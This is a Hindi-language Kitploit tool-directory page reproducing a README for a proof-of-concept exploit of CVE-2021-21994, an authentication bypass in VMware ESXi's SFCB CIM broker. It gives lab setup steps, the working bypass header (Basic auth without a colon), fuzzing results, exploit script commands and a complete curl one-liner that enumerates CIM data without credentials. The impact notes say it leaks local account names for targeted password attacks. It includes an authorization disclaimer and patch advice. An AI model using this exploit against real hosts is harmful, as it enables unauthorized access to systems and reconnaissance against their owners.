Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
cve-2021-21994_POC — VMware ESXi SFCB प्रमाणीकरण बाईपास (CVE-2021-21994) को probe/fuzz harness के माध्यम से validate और exploit करता है, जिससे बिना प्रमाणीकरण के CIM-XML enumeration संभव हो पाती है। | Kitploit
उपकरण/GitHubGitHub/mreza-en/cve-2021-21994_poc
भेद्यता विश्लेषणशोषणजानकारी एकत्र करनाफज़िंगपेनिट्रेशन टेस्टिंगप्रमाणीकरण
GitHubmreza-en/cve-2021-21994_poc

cve-2021-21994_POC

VMware ESXi SFCB प्रमाणीकरण बाईपास (CVE-2021-21994) को probe/fuzz harness के माध्यम से validate और exploit करता है, जिससे बिना प्रमाणीकरण के CIM-XML enumeration संभव हो पाती है।

रिपॉजिटरी देखें
726 दिन पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2021-21994 — VMware ESXi SFCB प्रमाणीकरण बायपास — लैब अनुसंधान किट

फ़ील्डमान
प्रकारCWE-287 अनुचित प्रमाणीकरण (auth बायपास)
घटकVMware ESXi के अंदर SFCB (Small Footprint CIM Broker)
हमला वेक्टरनेटवर्क, TCP 5989 (HTTPS पर CIM-XML), "विशेष रूप से तैयार किया गया अनुरोध"
प्रभावितVMSA-2021-0014 (जुलाई 2021) से पहले ESXi 6.5 / 6.7 / 7.0
समाधानVMSA-2021-0014 पैच बिल्ड
सार्वजनिक PoCकोई नहीं। VMware ने कभी भी अनुरोध के स्वरूप का खुलासा नहीं किया

संदर्भ: NVD · VMSA-2021-0014 (Broadcom) · SentinelOne DB

क्योंकि कोई PoC मौजूद नहीं है, यह किट एक खुद-खोजें हार्नेस है: sfcb_probe.py एक ओरेकल (check) को मान्य करता है, फिर /cimom पर एक लक्षित म्यूटेशन डिक्शनरी (fuzz) भेजता है और बिना वैध क्रेडेंशियल्स के प्राप्त किसी भी 200-with-CIM-body को फ़्लैग करता है।

केवल अपने स्वयं के लैब VM या किसी अधिकृत एंगेजमेंट स्कोप के अंदर स्पष्ट रूप से शामिल लक्ष्यों के विरुद्ध उपयोग करें।

1. लैब सेटअप (लक्ष्य से मेल खाता हुआ: ESXi 6.5)

  1. एक ESXi 6.5 ISO प्राप्त करें (जुलाई-2021 से पहले का कोई भी बिल्ड काम करता है; आदर्श रूप से लक्ष्य के समान 6.5.0 बिल्ड श्रेणी का):
    • Broadcom सपोर्ट पोर्टल (मुफ़्त खाता) → VMware vSphere Hypervisor 6.5 डाउनलोड
    • HPE / Dell "कस्टम ESXi 6.5 इमेज" डाउनलोड उनके सपोर्ट साइटों पर सार्वजनिक हैं
  2. VMware Workstation/Fusion (या KVM) में नेस्टेड VM:
    • VM पर "Virtualize Intel VT-x/EPT" सक्षम करें
    • 2 vCPU, 6 GB RAM, थिन डिस्क; इंस्टॉलर के लिए E1000 NIC
    • इवैलुएशन मोड में इंस्टॉल करें — लैब के लिए कोई लाइसेंस कुंजी आवश्यक नहीं
  3. CIM ब्रोकर और उसके फ़ायरवॉल नियमसेट को सक्षम करें (DCUI → Troubleshooting → ESXi Shell/SSH सक्षम करें, फिर SSH के माध्यम से):
    root@kitploit:~
    /etc/init.d/sfcbd-watchdog status || /etc/init.d/sfcbd-watchdog start
    esxcli network firewall ruleset set --ruleset-id=CIMHttpsServer --enabled=true
    esxcli network firewall ruleset list | grep -i cim
    esxcli network ip connection list | grep 5989   # must LISTEN
    
  4. VM का स्नैपशॉट लें (पुनः परीक्षण के लिए स्वच्छ अवस्था)।

2. हार्नेस चलाएँ

root@kitploit:~
# establish the oracle first (needs a real local ESXi account, e.g. root)
python3 sfcb_probe.py check 192.168.x.x -u root -P 'lab-password'

# expect: no-auth -> 401, bogus -> 401, valid -> 200
# then fuzz (uses only bogus/no creds, never your real ones):
python3 sfcb_probe.py fuzz 192.168.x.x --dump out/

2b. निष्कर्ष (लैब + लक्ष्य ESXi 6.5, पुष्टि 2026-08-15)

बायपास मिल गया। मूल कारण: जब Basic auth टोकन एक ऐसे user:password जोड़े में डिकोड नहीं होता जिसमें : हो, तो sfcbd OPEN में विफल हो जाता है।

न्यूनतम PoC हेडर (root का base64, बिना कोलन):

root@kitploit:~
Authorization: Basic cm9vdA==

फ़ज़ रन से साक्ष्य मैट्रिक्स:

अनुरोध आकारस्थितिअर्थ
कोई हेडर नहीं / वैध user:pass b64 / : / root:401कोलन मौजूद → auth चलता है → अस्वीकृत
b64("root") (कोई कोलन नहीं)200 + CIM bodyकोई कोलन नहीं → auth छोड़ दिया गया
b64("\0:\0") (खाली C-स्ट्रिंग)200समान: कोई कोलन नहीं
अमान्य base64 (स्पेस / BOM / Basic उपसर्ग)200डिकोड विफलता → auth छोड़ दिया गया
Basic\tTOKEN (टैब विभाजक)401कोई भी WSP विभाजन ठीक से पार्स होता है → auth चलता है
Basic␣␣TOKEN (डबल स्पेस)200सिंगल-स्पेस विभाजन → टोकन स्पेस से शुरू होता है → डिकोड विफल हो जाता है

एक 200 प्रतिक्रिया CIMOM के अंदर भेजा गया CIM-XML लिफाफा लेकर आती है (जैसे ERROR CODE="5" Class not found), जिससे सिद्ध होता है कि HTTP auth परत पार हो गई थी — बिना मैलफॉर्म्ड हेडर के समान अनुरोध 401 लौटाता है।

एक्सप्लॉइट उपयोग:

root@kitploit:~
python3 sfcb_exploit.py verify    192.168.x.x          # oracle proof, prints VULNERABLE
python3 sfcb_exploit.py classes   192.168.x.x          # dump class names of a namespace
python3 sfcb_exploit.py instances 192.168.x.x -c CIM_ComputerSystem

रिपोर्ट स्क्रीनशॉट के लिए curl वन-लाइनर:

root@kitploit:~
curl -sk -X POST "https://192.168.x.x:5989/cimom" \
  -H 'Content-Type: application/xml; charset=utf-8' \
  -H 'CIMOperation: MethodCall' -H 'CIMMethod: EnumerateClassNames' \
  -H 'CIMObject: root/cimv2' -H 'Authorization: Basic cm9vdA==' \
  -d '<CIM CIMVERSION="2.0" DTDVERSION="2.0"><MESSAGE ID="1" PROTOCOLVERSION="1.0"><SIMPLEREQ><IMETHODCALL NAME="EnumerateClassNames"><LOCALNAMESPACEPATH><NAMESPACE NAME="root"/><NAMESPACE NAME="cimv2"/></LOCALNAMESPACEPATH></IMETHODCALL></SIMPLEREQ></MESSAGE></CIM>'

प्रभाव: CIM ब्रोकर तक बिना प्रमाणीकरण के पढ़ने की पहुँच:

  • खाता गणना (Account enumeration): VMware_Identity इंस्टेंस सभी ESXi स्थानीय खातों को लीक करते हैं (लैब 6.5 पर देखा गया: root, dcui, vpxuser — vCenter-प्रबंधित होस्ट — साथ ही कस्टम उपयोगकर्ता), जिससे लक्षित पासवर्ड हमले संभव होते हैं।
  • 436 उजागर कक्षाओं (कंप्यूटर सिस्टम, प्रोसेसर, मेमोरी, स्टोरेज/डेटास्टोर, नेटवर्क एंडपॉइंट, फर्मवेयर/BIOS संस्करण, सेंसर, इंस्टॉल किए गए सॉफ़्टवेयर की पहचान) के माध्यम से पूर्ण होस्ट/हार्डवेयर इन्वेंट्री।
  • कोई लेखन पथ नहीं: RBAC सेवाएँ (VMware_RoleBasedAuthorizationService, CIM_PrivilegeManagementService) DMTF प्रोफ़ाइल विधियाँ (AssignRoles, AssignAccess, ...) घोषित करती हैं लेकिन कोई इंस्टेंस उजागर नहीं करतीं — विधियाँ केवल स्कीमा-आधारित हैं। इस CVE के साथ CIM के माध्यम से खाता निर्माण/संशोधन संभव नहीं है; प्रभाव की सीमा बिना प्रमाणीकरण के सूचना प्रकटीकरण है।

निर्णय:

  • BYPASS-STRONG — बिना वैध क्रेडेंशियल्स के HTTP 200 + CIM-XML बॉडी → आपको बायपास मिल गया; डंप किया गया अनुरोध आपका एक्सप्लॉइट प्रिमिटिव है।
  • bypass-weak(200-no-cim-body) — 200 लेकिन कोई CIM बॉडी नहीं; डंप का निरीक्षण करें।
  • blocked / info(400) — अस्वीकृत। ध्यान दें: 400 का आमतौर पर अर्थ है कि अनुरोध auth का मूल्यांकन होने से पहले समाप्त हो गया — फिर भी दिलचस्प है, बस बायपास नहीं।

हाथ से बनाए गए CIM बॉडी पर ध्यान दें: DSP0200 के अनुसार, EnumerateInstanceNames को ClassName IPARAMVALUE की आवश्यकता होती है। इसके बिना किसी बॉडी को auth से असंबंधित कारणों से अस्वीकार किया जा सकता है और ओरेकल दूषित हो सकता है — हार्नेस हमेशा स्पेक-सही बॉडी भेजता है।

3. यदि डिक्शनरी को कुछ न मिले तो रोडमैप

फ़ज़र क्लासिक HTTP auth-पार्सर भ्रम आकृतियों को कवर करता है। यदि कोई सफल नहीं होता, तो शेष (और निश्चित) मार्ग है बाइनरी डिफिंग:

  1. VMware के सार्वजनिक डिपो इंडेक्स से एक कमजोर बिल्ड (जैसे 6.5.0 GA-क्लास) और VMSA-2021-0014-पैच किए गए 6.5/6.7/7.0 बिल्ड के लिए esx-base VIB खींचें: https://hostupdate.vmware.com/software/VUM/PRODUCTION/main/vmw-depot-index.xml
  2. दोनों VIB निकालें (वे ar आर्काइव हैं → vib पेलोड → cpio), Ghidra + BinDiff के साथ sfcbd* बाइनरीज़ का डिफ करें।
  3. HTTP हेडर पार्सिंग / Basic-auth डिकोड / auth-प्रदाता डिस्पैच पर ध्यान केंद्रित करें। अपस्ट्रीम ओपन-सोर्स SFCB (SourceForge पर SBLIM sfcb) HTTP+auth कोड पथ के लिए एक उपयोगी संरचनात्मक संदर्भ है, भले ही ESXi का फोर्क संशोधित है।
  4. फिक्स किए गए कोड पथ को सटीक तैयार किए गए अनुरोध में बदलें, इसे हार्नेस में जोड़ें, लैब VM पर सत्यापित करें — यही वास्तविक एक्सप्लॉइट है।

4. रिपोर्ट के लिए परिचालन नोट्स

  • अकेला ओरेकल (unauth → 401) पहले से ही हार्डनिंग के लिए एक उपयोगी निष्कर्ष है: 5989 कभी भी इंटरनेट-सुलभ नहीं होना चाहिए।
  • यदि पुष्टि हो, निवारण: VMSA-2021-0014+ पैच लागू करें (ESXi 6.5 EOL है — माइग्रेशन की अनुशंसा करें) या 5989 को फ़ायरवॉल करें।
टूल डाउनलोड करें